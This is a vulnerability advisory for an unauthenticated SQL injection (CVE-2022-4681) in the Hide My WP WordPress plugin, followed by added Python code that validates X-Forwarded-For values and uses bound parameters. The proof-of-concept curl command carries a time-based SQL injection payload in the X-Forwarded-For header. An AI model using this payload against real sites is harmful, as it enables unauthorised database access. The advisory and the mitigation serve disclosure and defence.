WordPress Hide My WP SQL Injection

2024.03.11
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
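The mitigation for this class of bug, as an added example (not the plugin's code and not part of the original advisory): treat X-Forwarded-For as untrusted input, accept it only if every entry parses as an IP address, and pass it to the database as a bound parameter. Python's sqlite3 stands in for the WordPress database layer here; the `visit_log` table and the function names are hypothetical.

```python
import ipaddress
import sqlite3

# Constructed sample header values; the last one is the value from the PoC above.
SAMPLE_XFF = [
    "203.0.113.7",
    "2001:db8::1, 198.51.100.4",
    "127.0.0.1'+(select*from(select(sleep(20)))a)+'",
]


def parse_xff(header_value):
    """Return the left-most X-Forwarded-For entry as a canonical IP string,
    or None if any entry in the header is not a valid IPv4/IPv6 address."""
    entries = [e.strip() for e in header_value.split(",")]
    try:
        parsed = [ipaddress.ip_address(e) for e in entries]
    except ValueError:
        return None
    return str(parsed[0])


def log_visit(db, header_value):
    """Store the client address with a bound parameter, never by concatenation.
    Returns True if a row was written, False if the header was rejected."""
    ip = parse_xff(header_value)
    if ip is None:
        return False
    # Hypothetical table; the placeholder keeps the value out of the SQL text.
    db.execute("INSERT INTO visit_log (ip) VALUES (?)", (ip,))
    return True


def run_samples():
    """Run the constructed samples against an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visit_log (ip TEXT NOT NULL)")
    results = [log_visit(db, v) for v in SAMPLE_XFF]
    stored = [r[0] for r in db.execute("SELECT ip FROM visit_log ORDER BY rowid")]
    return results, stored


if __name__ == "__main__":
    print(run_samples())
```

Rejected header values are also worth logging, since a non-IP X-Forwarded-For is a useful detection signal for probing of this kind.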

